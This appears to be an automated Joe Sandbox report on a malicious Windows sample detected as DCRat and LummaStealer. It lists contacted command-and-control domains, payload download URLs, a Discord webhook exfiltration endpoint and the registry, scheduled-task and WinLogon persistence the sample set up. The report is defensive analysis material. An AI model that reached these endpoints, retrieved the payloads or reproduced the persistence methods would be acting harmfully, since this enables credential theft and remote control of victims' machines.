C:\Users\user\Desktop\OJAsYAeC.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\jsWPmlvb.log	8%	ReversingLabs
C:\Users\user\Desktop\mOEXVCEF.log	8%	ReversingLabs
C:\Users\user\Desktop\oYbYVUjG.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\rWfFWfLI.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Speech\kdmapper.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\physmeme.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://player.vimeo.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://medal.tv	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steam.tv/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://help.steampowered.com/	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	unknown
file.garden	188.114.96.3	true	false	unknown
fossillargeiw.shop	unknown	unknown	true	unknown
strappystyio.shop	unknown	unknown	true	unknown
tiddymarktwo.shop	unknown	unknown	true	unknown
coursedonnyre.shop	unknown	unknown	true	unknown
captainynfanw.shop	unknown	unknown	true	unknown
tearrybyiwo.shop	unknown	unknown	true	unknown
zelensky.top	unknown	unknown	true	unknown
surveriysiop.shop	unknown	unknown	true	unknown
appleboltelwk.shop	unknown	unknown	true	unknown
tendencerangej.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
coursedonnyre.shop	true		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin	false		unknown
strappystyio.shop	true		unknown
tearrybyiwo.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin	false		unknown
captainynfanw.shop	true		unknown
fossillargeiw.shop	true		unknown
tiddymarktwo.shop	true		unknown
surveriysiop.shop	true		unknown
appleboltelwk.shop	true		unknown
tendencerangej.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900%	RegAsm.exe, 0000000C.00000002.1538876694.000000000132A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000020.00000002.1965574807.00000251FDFE6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binbth.dll	curl.exe, 00000004.00000002.1492818711.0000019B0A2AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://medal.tv	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://zelensky.top	msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO	seoI30IZZr.exe	false		unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://strappystyio.shop/api=	RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://auth.gg/	seoI30IZZr.exe	false		unknown
http://crl.micft.cMicRosof	powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/	msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php	msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:	curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steam.tv/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.com/license	seoI30IZZr.exe	false		unknown
http://www.houseindustries.com/licenseBurbank	seoI30IZZr.exe	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.comhttp://www.talleming.comHouse	seoI30IZZr.exe	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.mic	powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/i	RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://recaptcha.net	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sketchfab.com	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900S	RegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.youtube.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:27060	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:	curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/licenseCopyright	seoI30IZZr.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://surveriysiop.shop/api	RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/;	RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	file.garden	European Union		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522824
Start date and time:	2024-09-30 18:18:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	72
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	seoI30IZZr.exe renamed because original name is a hash value
Original Sample Name:	26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@80/50@21/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 52% Number of executed functions: 12 Number of non-executed functions: 122
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WmiPrvSE.exe, PID 3484 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 5656 because it is empty
Execution Graph export aborted for target msedge.exe, PID 1836 because it is empty
Execution Graph export aborted for target msedge.exe, PID 1856 because it is empty
Execution Graph export aborted for target msedge.exe, PID 4900 because it is empty
Execution Graph export aborted for target msedge.exe, PID 7140 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6864 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: seoI30IZZr.exe

Simulations

Behavior and APIs

Time	Type	Description
12:19:15	API Interceptor	3x Sleep call for process: RegAsm.exe modified
12:19:34	API Interceptor	59x Sleep call for process: powershell.exe modified
12:19:57	API Interceptor	1x Sleep call for process: msedge.exe modified
18:19:32	Task Scheduler	Run new task: WmiPrvSE path: "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:19:32	Task Scheduler	Run new task: WmiPrvSEW path: "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:19:34	Task Scheduler	Run new task: msedge path: "C:\Edge\msedge.exe"
18:19:34	Task Scheduler	Run new task: msedgem path: "C:\Edge\msedge.exe"
18:19:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:19:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:19:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:20:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:20:13	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:20:21	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:20:38	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\WmiPrvSE.exe"
18:20:46	Autostart	Run: WinLogon Shell "C:\Edge\msedge.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zip	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/malt.zip	Get hash	malicious	Unknown	Browse	104.102.49.254
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	Clipboard Hijacker, Vidar	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://serrespec.weebly.com/tc2000-stock-charting-software.html	Get hash	malicious	Unknown	Browse	104.22.52.71
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	172.67.148.87
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	104.18.86.42
AKAMAI-ASUS	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	104.102.35.2
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	173.223.116.167
	Xkci1BfrmX.lnk	Get hash	malicious	LonePage	Browse	23.56.162.185
	Snc2ZNvAZP.pdf	Get hash	malicious	Unknown	Browse	23.56.162.185
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	23.56.162.185
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	96.17.64.189
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	188.114.96.3
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ha9wYxkNI7.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	9KO1ScZ376.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	U4hM4c3l4m.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	f1w58Se3jL.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	6EFA6YABDc.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	1ehTzqaTXV.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	Document.pdf.lnk	Get hash	malicious	Bitter Elephant	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.102.49.254
	PI#0034250924.xla.xlsx	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	Transmission Cost Database 2.0.xlsb	Get hash	malicious	Unknown	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AznuGYbp.log	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	p3f932IsTO.exe	Get hash	malicious	DCRat	Browse
	UpU2O6YQxG.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	5WbBcHi91R.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4LU843t3Vt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ggJWCFp2S3.exe	Get hash	malicious	DCRat	Browse
	yQrCGtNgsf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qDlkXj5kcZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	C0laqZmkEf.exe	Get hash	malicious	DCRat	Browse

Created / dropped Files

C:\Edge\61a52ddc9dd915

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (427), with no line terminators
Category:	dropped
Size (bytes):	427
Entropy (8bit):	5.849378121744108
Encrypted:	false
